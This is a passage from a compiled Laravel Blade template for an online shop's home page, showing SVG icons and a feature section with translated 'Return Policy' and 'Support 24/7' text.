fill="white" /> </mask> <g mask="url(#mask0_1211_583)"> <path fill-rule="evenodd" clip-rule="evenodd" d="M13.4168 27.1116C14.3017 27.9756 15.7266 27.9651 16.6056 27.0816L17.6885 26.0017C18.5285 25.1632 19.6894 24.6848 20.8728 24.6848H22.4178C23.6687 24.6848 24.6856 23.6678 24.6856 22.4184V20.875C24.6856 19.6736 25.1506 18.5441 25.9995 17.6937L27.0795 16.6122C27.519 16.1713 27.7544 15.5998 27.7529 14.9938C27.7514 14.3894 27.513 13.8209 27.0825 13.3919L26.001 12.309C25.1506 11.4525 24.6856 10.3246 24.6856 9.12318V7.58277C24.6856 6.33184 23.6687 5.3149 22.4178 5.3149H20.8758C19.6744 5.3149 18.545 4.84842 17.6945 4.00397L16.6116 2.91954C15.7101 2.02709 14.2717 2.03159 13.3913 2.91804L12.3128 3.99947C11.4519 4.84992 10.3225 5.3149 9.12553 5.3149H7.58212C6.33269 5.3164 5.31575 6.33334 5.31575 7.58277V9.12018C5.31575 10.3216 4.84927 11.451 4.00332 12.303L2.93839 13.3694C2.92789 13.3814 2.91739 13.3904 2.90689 13.4009C2.02644 14.2874 2.03094 15.7258 2.91739 16.6062L4.00032 17.6892C4.84927 18.5411 5.31575 19.6706 5.31575 20.872V22.4184C5.31575 23.6678 6.33119 24.6848 7.58212 24.6848H9.12253C10.3255 24.6863 11.4549 25.1527 12.3053 26.0002L13.3868 27.0786C13.3958 27.0891 13.4063 27.0996 13.4168 27.1116ZM14.9972 30.0002C13.8468 30.0002 12.6963 29.5652 11.8159 28.6923C11.8039 28.6803 11.7919 28.6683 11.7799 28.6548L10.715 27.5914C10.2905 27.1699 9.72352 26.9359 9.12055 26.9344H7.58164C5.09029 26.9344 3.06541 24.908 3.06541 22.4182V20.8717C3.06541 20.2688 2.82992 19.7033 2.40694 19.2773L1.32851 18.2004C-0.423392 16.4575 -0.444391 13.6197 1.27601 11.8498C1.28951 11.8363 1.30301 11.8228 1.31651 11.8093L2.40844 10.7143C2.82992 10.2899 3.06541 9.72139 3.06541 9.11993V7.58252C3.06541 5.09266 5.09029 3.06628 7.58014 3.06478H9.12505C9.72652 3.06478 10.2935 2.82929 10.724 2.40482L11.7964 1.32938C13.5498 -0.436017 16.4161 -0.445016 18.1845 1.31288L19.281 2.40932C19.7054 2.83079 20.2724 3.06478 20.8754 3.06478H22.4173C24.9086 3.06478 26.935 5.09116 26.935 7.58252V9.12293C26.935 9.72439 27.169 10.2929 27.5935 10.7203L28.6704 11.7988C29.5239 12.6462 29.9978 13.7787 30.0023 14.9861C30.0068 16.1935 29.5404 17.329 28.6899 18.1854L27.5905 19.2818C27.169 19.7063 26.935 20.2718 26.935 20.8747V22.4182C26.935 24.908 24.9086 26.9344 22.4188 26.9344H20.8724C20.2784 26.9344 19.6979 27.1744 19.2765 27.5929L18.1995 28.6698C17.3191 29.5562 16.1581 30.0002 14.9972 30.0002Z" fill="currentColor" /> </g> <path fill-rule="evenodd" clip-rule="evenodd" d="M11.145 19.9811C10.857 19.9811 10.569 19.8716 10.3501 19.6511C9.91058 19.2116 9.91058 18.5006 10.3501 18.0612L18.0596 10.3501C18.4991 9.91064 19.2115 9.91064 19.651 10.3501C20.0905 10.7896 20.0905 11.502 19.651 11.9415L11.94 19.6511C11.721 19.8716 11.433 19.9811 11.145 19.9811Z" fill="currentColor" /> <path fill-rule="evenodd" clip-rule="evenodd" d="M18.7544 20.2476C17.925 20.2476 17.247 19.5772 17.247 18.7477C17.247 17.9183 17.9115 17.2478 18.7409 17.2478H18.7544C19.5839 17.2478 20.2543 17.9183 20.2543 18.7477C20.2543 19.5772 19.5839 20.2476 18.7544 20.2476Z" fill="currentColor" /> <path fill-rule="evenodd" clip-rule="evenodd" d="M11.2548 12.748C10.4254 12.748 9.74744 12.0775 9.74744 11.2481C9.74744 10.4186 10.4119 9.74817 11.2413 9.74817H11.2548C12.0843 9.74817 12.7548 10.4186 12.7548 11.2481C12.7548 12.0775 12.0843 12.748 11.2548 12.748Z" fill="currentColor" /> </svg> </span> </div> <div class="tp-feature-content-2"> <h3 class="tp-feature-title-2"><?php echo e(\App\CPU\translate('Return Policy')); ?></h3> <p><?php echo e(\App\CPU\translate('Return Your Product in 7 Days !')); ?></p> </div> </div> </div> <div class="col-xl-3 col-lg-3 col-md-6 col-sm-6"> <div class="tp-feature-item-2 d-flex align-items-start"> <div class="tp-feature-icon-2 mr-10"> <span> <svg width="31" height="30" viewBox="0 0 31 30" fill="none" xmlns="../../../www.w3.org/2000/svg.html"> <path d="M1.5 24.3333V15C1.5 11.287 2.975 7.72602 5.60051 5.10051C8.22602 2.475 11.787 1 15.5 1C19.213 1 22.774 2.475 25.3995 5.10051C28.025 7.72602 29.5 11.287 29.5 15V24.3333" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" /> <path d="M29.5 25.8889C29.5 26.714 29.1722 27.5053 28.5888 28.0888C28.0053 28.6722 27.214 29 26.3889 29H24.8333C24.0082 29 23.2169 28.6722 22.6335 28.0888C22.05 27.5053 21.7222 26.714 21.7222 25.8889V21.2222C21.7222 20.3971 22.05 19.6058 22.6335 19.0223C23.2169 18.4389 24.0082 18.1111 24.8333 18.1111H29.5V25.8889ZM1.5 25.8889C1.5 26.714 1.82778 27.5053 2.41122 28.0888C2.99467 28.6722 3.78599 29 4.61111 29H6.16667C6.99179 29 7.78311 28.6722 8.36656 28.0888C8.95 27.5053 9.27778 26.714 9.27778 25.8889V21.2222C9.27778 20.3971 8.95 19.6058 8.36656 19.0223C7.78311 18.4389 6.99179 18.1111 6.16667 18.1111H1.5V25.8889Z" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" /> </svg> </span> </div> <div class="tp-feature-content-2"> <h3 class="tp-feature-title-2"><?php echo e(\App\CPU\translate(key: 'Support 24/7')); ?></h3> <p><?php echo e(\App\CPU\translate(key: 'Contact us anytime !')); ?></p> </div> </div> </div> </div> </div> </div> </section> <!-- feature area end --> <?php $__env->stopSection(); ?> <?php echo $__env->make('layouts.front-end.app', \Illuminate\Support\Arr::except(get_defined_vars(), ['__data', '__path']))->render(); ?><?php /**PATH /var/www/arsu/resources/themes/default/web-views/home.blade.php ENDPATH**/ ?>
./Ninja\.